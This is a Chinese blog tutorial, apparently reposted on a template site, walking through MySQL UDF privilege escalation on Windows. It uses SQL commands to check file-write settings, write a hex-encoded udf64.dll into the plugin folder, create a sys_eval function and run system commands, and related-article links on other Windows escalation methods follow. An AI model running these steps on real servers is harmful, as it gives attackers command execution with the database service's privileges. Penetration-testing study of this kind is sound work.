Windows机器的udf提权

这篇具有很好参考价值的文章主要介绍了Windows机器的udf提权。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前提条件

(1)需要拿到mysql的权限

(2)mysql有写入文件的权限

实验步骤

(1)拿到数据库操作页面

Windows机器的udf提权

(2)查询mysql版本,不同版本dll文件位置不同

select version();

Windows机器的udf提权

(3)查询是否有写入文件权限

show variables like "%secure%";

Windows机器的udf提权

(4)查询plugin文件路径

show variables like "%plugin%";

Windows机器的udf提权

(5)将udf文件内容转换成16进制

select hex(load_file('C:\\udf64.dll')) into dumpfile 'c:\\udf64.txt'

(6)将本地udf64.dll文件以16进制数据上传到远程机器

当mysql版本大于5.1时需要上传到远程机器mysql\lib\plugin\udf64.dll中

SELECT 0x(16位数据) into dumpfile 'D:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf64.dll';

Windows机器的udf提权

当mysql版本大于5.0小于5.1时是按照dll加载顺序来加载dll文件,顺序是:

(1)可执行文件目录

(2)C:\Windows\System32

(3)C:\Windows\System

(4)C:\Windows

(5)PATH环境变量中列出的目录

(7)创建函数

create function sys_eval returns string soname 'udf64.dll';

Windows机器的udf提权

如果失败,报错:Can't open shared library 'udf.dll',可能是因为mysql是32位或64位,与udf文件不匹配。成功入坑。牢记牢记。

查看mysql是32位还是64位

Windows机器的udf提权

这里是64位的

(8)执行命令

select sys_eval("whoami");

Windows机器的udf提权

这里提权,是提升到运行mysql服务的用户权限,如果mysql服务是以mysql用户运行的,那么提升到的权限也就是mysql,如果mysql服务是以administrator或者system运行,那么自然就提升到administrator或者system用户。

(9)删除函数

drop function sys_eval;

Windows机器的udf提权

(10)查看udf函数文章来源地址https://www.toymoban.com/news/detail-710929.html

select * from mysql.func;

到了这里,关于Windows机器的udf提权的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 通过条件竞争实现内核提权

    条件竞争漏洞(Race Condition Vulnerability)是一种在多线程或多进程并发执行时可能导致不正确行为或数据损坏的安全问题。这种漏洞通常发生在多个线程或进程试图访问和修改共享资源(如内存、文件、网络连接等)时,由于执行顺序不确定或没有适当的同步措施,导致竞争条

    2024年02月08日
    浏览(47)
  • 软件测试工程师需要达到什么水平才能顺利拿到 20k 无压力?

    最近有粉丝朋友问:软件测试员需要达到什么水平才能顺利拿到 20k 无压力? 这里写一篇文章来详细说说: 作为软件测试人员,首先要具备扎实的测试基础知识。这包括测试方法、测试流程、测试用例设计、缺陷管理等方面的掌握。我们需要了解各种测试类型和级别,如单元

    2023年04月23日
    浏览(52)
  • windows提权-绕过UAC提权

    目录 windows提权-绕过UAC提权 一、UAC概述 二、MSF和CS过UAC 三、基于白名单AutoElevate绕过UAC 四、基于白名单DLL劫持绕过UAC提权 五、CVE-2019-1388 UAC提权 六、Windows令牌概述和令牌窃取攻击 UAC(User Account Control),中文翻译为用户帐户控制,是微软在Windows Vista和Windows7中引用的新技术

    2024年02月04日
    浏览(33)
  • windows提权-系统错误配置提权

    目录 windows提权-系统错误配置提权 一、错误配置提权介绍 二、Tusted Service Paths提权 三、PATH环境变量提权 四、不安全的服务提权 五、不安全注册表提权 六、注册表键AlwaysInstall提权 七、泄露敏感信息提权 八、计划任务提权 九、启动项提权 随着网络安全的发展和普及,不打补

    2024年02月03日
    浏览(34)
  • 你们心目中程序员满意的薪资需要达到多少?只需做到这些拿到20K没问题

    算法:技术面试笔试都考算法题,所以LeetCode至少得刷两三百道,坚持做过所有题目都练习一遍。做过ACM更好。算法虽然是程序员的基础技能,却也是最难的一部分,因为算法题目往往涉及到很多细节,需要耐心思考和总结。但是,掌握好算法对于提高编程能力和获得更好的

    2023年04月23日
    浏览(56)
  • docker Mysql-udf-http

     1. Mysql-udf-http镜像已上传到dockerhub中 2.启动镜像(默认密码root1234)   3.命令 4.连接:root/root1234 5.运行 SELECT http_post(\\\'http://192.168.101.9:8054/udf/test2\\\',\\\'a=xoyo333b=0111111\\\');   192.168.101.9:机器ip地址 8054项目端口  udf/test2接口  a=xoyo333b=0111111入参 6.java代码: controller 7.测试: navaicat中运

    2024年02月03日
    浏览(32)
  • windows系统服务器在不解锁屏幕不输入密码的前提下,电脑通电开机启动程序。

    在控制面板中找到“管理工具”中的 “任务计划程序”,打开“任务计划程序”窗口。如图:   双击打开任务计划程序,空白出右键创建基本任务,或者点击最右侧的创建基本任务。  输入名称,点击下一步。 先选择计算机启动时,后面会进行改动;点击下一步。 选择启动

    2024年02月04日
    浏览(47)
  • 提权-MySQL数据库提权

    1.服务器开启了数据库服务。 2.知道数据库最高权限帐号密码。 除了access数据库外,其他数据库都有提权的可能。 探针服务器数据库应用方法 1.端口扫描   通过端口判断是都运行了数据库服务。 常见数据库默认端口: Oracle — 1521 MySQL — 3306 SQL Server — 1433 PostgreSQL — 5432

    2024年02月14日
    浏览(29)
  • Windows提权

    目录 一、Windows内核溢出漏洞ATSCPS提权 1.基于WEB环境下的权限提升    windows内核溢出漏洞提权 2.基于本地环境下的权限提升-ATSCPS命令 AT SC PS 二、数据库提权 1.Mysql udf提权 MOF提权 2.SQL Server xp_cmdshell提权 xp_oacreate+sp_oamethod提权 sandbox沙盒提权 3.Oracle提权 三、RedisPostgre令牌窃取进

    2024年02月02日
    浏览(37)
  • Windows提权流程及手法

    收集本机systeminfo中补丁信息 在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp 查询exp,选择对应的Exp下载运行 提权Exp的运行方式,一般有以下几种: 1、直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是system 2、在WebShell中执行exe程序,执行方式为xxx

    2024年02月08日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包